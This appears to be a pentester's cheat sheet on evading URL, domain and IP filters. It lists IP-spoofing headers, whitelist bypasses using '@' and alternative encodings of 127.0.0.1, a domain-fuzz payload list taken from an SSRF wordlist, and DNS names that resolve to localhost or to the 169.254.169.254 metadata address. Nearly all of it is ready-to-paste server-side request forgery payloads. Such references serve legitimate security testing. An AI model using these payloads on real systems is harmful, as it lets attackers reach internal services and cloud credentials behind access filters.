Bypassing URL/Domain/IP Formats

• URL Format Bypass (HackTricks)
• URL Obfuscation With Decimal IP Address

IP Spoofing

Test with these HTTP headers to spoof the IP address. See List of HTTP header fields (Wikipedia).

X-Forwarded-For: client1, proxy1, proxy2
X-Forwarded-For: 111.111.111.111
X-Forwarded-For: 111.111.111.111, 222.222.222.222, 333.333.333.333

X-Forwarded-Host: example.com
X-Forwarded-Host: example.com:8080

Forwarded: for=111.111.111.111;proto=http;by=222.222.222.222
Forwarded: for=111.111.111.111, for=222.222.222.222

Bypass domain whitelisting

Goes to last domain

http://example.com@lisandre.com
https://facebook.com@linkedin.com

nslookup google.com
https://lisandre.com@172.217.13.206

# Decimal bypass: 172.217.13.206 translates to 2899905998 (see IPv4 to decimal)
nslookup google.com 
https://lisandre.com@2899905998

# Octal bypass: 172.217.13.206 translates to 025466206716 (see IP to octal)
nslookup google.com 
https://lisandre.com@025466206716

Bypass protections on 127.0.0.1 or localhost

• Using an alternative IP representation of 127.0.0.1, such as 2130706433, 017700000001, or 127.1.
• Registering your own domain name that resolves to 127.0.0.1.
• Use other domains that resolve to 127.0.0.1, like http://spoofed.burpcollaborator.net or nip.io or tinyurl
• Obfuscating blocked strings using URL encoding or case variation.
• To bypass filters on directory names, use double URL encoding (“a” is %2561). Or try changing the case like Admin, aDmin, ADMIN, etc. With the Hackvertor extension in Burp Suite:

<@replace('%','%25')><@urlencode_all>admin<@/urlencode_all><@/replace>

Bypass localhost filters

## Localhost
http://example.com@127.0.0.1
http://127.0.0.1:80
http://127.0.0.1:443
http://127.0.0.1:22
http://127.1:80
http://0
http://0.0.0.0:80
http://localhost:80
http://[::]:80/
http://[::]:25/ SMTP
http://[::]:3128/ Squid
http://[0000::1]:80/
http://[0:0:0:0:0:ffff:127.0.0.1]/thefile
http://①②⑦.⓪.⓪.⓪

## CDIR bypass
http://127.127.127.127
http://127.0.1.3
http://127.0.0.0

## Decimal bypass, see IPv4 to decimal
http://2130706433/ = http://127.0.0.1
http://017700000001 = http://127.0.0.1 # IP to octal format, see https://www.browserling.com/tools/ip-to-oct
http://3232235521/ = http://192.168.0.1

## Hexadecimal bypass
127.0.0.1 = 0x7f 00 00 01
http://0x7f000001/ = http://127.0.0.1
http://0xc0a80014/ = http://192.168.0.20

##Domain FUZZ bypass (from https://github.com/0x221b/Wordlists/blob/master/Attacks/SSRF/Whitelist-bypass.txt)
http://{domain}@127.0.0.1
http://127.0.0.1#{domain}
http://{domain}.127.0.0.1
http://127.0.0.1/{domain}
http://127.0.0.1/?d={domain}
https://{domain}@127.0.0.1
https://127.0.0.1#{domain}
https://{domain}.127.0.0.1
https://127.0.0.1/{domain}
https://127.0.0.1/?d={domain}
http://{domain}@localhost
http://localhost#{domain}
http://{domain}.localhost
http://localhost/{domain}
http://localhost/?d={domain}
http://127.0.0.1%00{domain}
http://127.0.0.1?{domain}
http://127.0.0.1///{domain}
https://127.0.0.1%00{domain}
https://127.0.0.1?{domain}
https://127.0.0.1///{domain}

DNS directing to localhost

localtest.me = 127.0.0.1
customer1.app.localhost.my.company.127.0.0.1.nip.io = 127.0.0.1
mail.ebc.apple.com = 127.0.0.6 (localhost)
127.0.0.1.nip.io = 127.0.0.1 (Resolves to the given IP)
www.example.com.customlookup.www.google.com.endcustom.sentinel.pentesting.us = Resolves to www.google.com
http://customer1.app.localhost.my.company.127.0.0.1.nip.io
http://bugbounty.dod.network = 127.0.0.2 (localhost)
1ynrnhl.xip.io == 169.254.169.254
spoofed.burpcollaborator.net = 127.0.0.1

DNS interaction

If you receive a DNS request in Burp Collaborator, try HTTP on the DNS port.

http://<burp collaborator ID>:53/

nip.io

https://nip.io

Wildcard DNS for any IP Address. Stop editing your etc/hosts file with custom hostname and IP address mappings. Will add Origin HTTP Header to HTTP requests.

Example with Amazon S3 bucket

http://s3-eu-west-1.amazonaws.com/<bucket_name>/.nip.io

Examples

nip.io allows you to do that by mapping any IP Address to a hostname using the following formats:

10.0.0.1.nip.io maps to 10.0.0.1
192-168-1-250.nip.io maps to 192.168.1.250
app.10.8.0.1.nip.io maps to 10.8.0.1
app-37-247-48-68.nip.io maps to 37.247.48.68
customer1.app.10.0.0.1.nip.io maps to 10.0.0.1
customer2-app-127-0-0-1.nip.io maps to 127.0.0.1

nip.io maps <anything>[.-]<IP Address>.nip.io in either “dot” or “dash” notation to the corresponding <IP Address>:

dot notation: magic.127.0.0.1.nip.io
dash notation: magic-127-0-0-1.nip.io

The “dash” notation is especially useful when using services like LetsEncrypt as it’s just a regular sub-domain of nip.io.